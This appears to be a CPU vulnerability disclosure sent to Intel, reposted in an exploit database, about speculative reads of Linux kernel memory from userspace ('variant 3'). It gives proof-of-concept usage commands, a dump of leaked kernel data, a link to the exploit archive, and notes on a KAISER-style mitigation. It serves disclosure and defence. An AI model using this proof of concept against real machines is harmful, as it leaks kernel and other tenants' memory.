== INTRODUCTION ==
This is a bug report about a CPU security issue that affects
processors by Intel, AMD and(to some extent) ARM.
I have written a PoC for this issue that, when executed in userspace
on an Intel Xeon CPU E5-1650 v3 machine with a modern Linux kernel,
can leak around 2000bytes per second from Linux kernel memory after a
~4-second startup,in a 4GiB address space window,with the ability to
read from random offsets in that window. The same thing also works on
an AMD PRO A8-9600 R7 machine, although a bit less reliably and slower.
On the Intel CPU, I also have preliminary results that suggest that it
may be possible to leak host memory (which would include memory owned
by other guests)from inside a KVM guest.
The attack doesn't seem to work as well on ARM - perhaps because ARM
CPUs don't perform as much speculative execution because of a
different performance-energy-tradeoff or so?
All PoCs are written against specific processors and will likely
require at least some adjustments before they can run in other
environments, e.g. because of hardcoded timing tresholds.############################################################
On the following Intel CPUs (the only ones tested so far), we managed
to leak information using another variant of this issue ("variant 3").
So far, we have not managed to leak information this way on AMD or ARM CPUs.- Intel(R) Xeon(R) CPU E5-1650 v3 @ 3.50GHz (in a workstation)- Intel(R) Core(TM) i7-6600U CPU @ 2.60GHz (in a laptop)
Apparently, on Intel CPUs, loads from kernel mappings in ring 3 during
speculative execution have something like the following behavior:- If the address isnot mapped (perhaps also under other
conditions?), instructions that depend on the load are not executed.- If the address is mapped, but not sufficiently cached, the load loads zeroes.
Instructions that depend on the load are executed.
Perhaps Intel decided that incase of a sufficiently high-latency load,
it makes sense to speculate ahead with a dummy value to get a chance to
prefetch cachelines for dependent loads,or something like that?
- If the address is sufficiently cached, the load loads the data stored at the
given address, without respecting the privilege level.
Instructions that depend on the load are executed.
This is the vulnerable case.
I have attached a PoC that works on both tested Intel systems, named
intel_kernel_read_poc.tar. Usage:
As root, determine where the core_pattern isin the kernel:=====# grep core_pattern /proc/kallsyms
ffffffff81e8aea0 D core_pattern
=====
Then,as a normal user, unpack the PoC and use it to leak the
core_pattern (and potentially other cached things around it)from
kernel memory, using the pointer from the previous step:=====
$ cat /proc/sys/kernel/core_pattern
/cores/%E.%p.%s.%t
$ ./compile.sh && time ./poc_test ffffffff81e8aea0 4096
ffffffff81e8aea02f 63 6f 726573 2f 2545 2e 2570 2e 2573 2e
|/cores/%E.%p.%s.|
ffffffff81e8aeb025 7400617070 6f 727420257020257320|%t.apport %p %s |
ffffffff81e8aec025 632025500000000000000000000000|%c
%P...........|[ zeroes ]
ffffffff81e8af20c0 a4 e8 81 ff ff ff ff c0 af e8 81 ff ff ff ff
|................|
ffffffff81e8af3020 8e f0 81 ff ff ff ff 75 d9 cd 81 ff ff ff ff|.......u.......|[ zeroes ]
ffffffff81e8bb6065 5b cf 81 ff ff ff ff 0000000000000000|e[..............|
ffffffff81e8bb7000 000000 6d 4100000000000000000000|....mA..........|[ zeroes ]
real 0m13.726s
user 0m9.820s
sys 0m3.908s
=====
As you can see, the core_pattern, part of the previous core_pattern (behind the
first nullbyte)and a few kernel pointers were leaked.
To confirm whether other leaked kernel data was leaked correctly, use gdb as
root to read kernel memory:=====# gdb /bin/sleep /proc/kcore[...](gdb) x/4gx 0xffffffff81e8af200xffffffff81e8af20:0xffffffff81e8a4c00xffffffff81e8afc00xffffffff81e8af30:0xffffffff81f08e200xffffffff81cdd975(gdb) x/4gx 0xffffffff81e8bb600xffffffff81e8bb60:0xffffffff81cf5b650x00000000000000000xffffffff81e8bb70:0x0000416d000000000x0000000000000000=====
Note that the PoC will report uncached bytesas zeroes.
To Intel:
Please tell me if you have trouble reproducing this issue.
Given how different my two test machines are, I would be surprised if this
didn't just work out of the box on other CPUs from the same generation.
This PoC doesn't have hardcoded timings or anything like that.
We have not yet tested whether this still works after a TLB flush.
Regarding possible mitigations:
A short while ago, Daniel Gruss presented KAISER:
https://gruss.cc/files/kaiser.pdf
https://lkml.org/lkml/2017/5/4/220(cached:
https://webcache.googleusercontent.com/search?q=cache:Vys_INYdkOMJ:https://lkml.org/lkml/2017/5/4/220+&cd=1&hl=en&ct=clnk&gl=ch
)
https://github.com/IAIK/KAISER
Basically, the issue that KAISER tries to mitigate is that on Intel
CPUs, the timing of a pagefault reveals whether the address is
unmapped or mapped as kernel-only (because for an unmapped address, a
pagetable walk has to occur whilefor a mapped address, the TLB can be
used). KAISER duplicates the top-level pagetables of all processes and
switches them on kernel entry and exit. The kernel's top-level
pagetable looks as before. In the top-level pagetable used while
executing userspace code, most entries that are only used by the
kernel are zeroed out,exceptfor the kernel text and stack that are
necessary to execute the syscall/exception entry code that has to
switch back the pagetable.
I suspect that this approach might also be usable for mitigating
variant 3, but I don't know how much TLB flushing / data cache
flushing would be necessary to make it work.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/43490.zip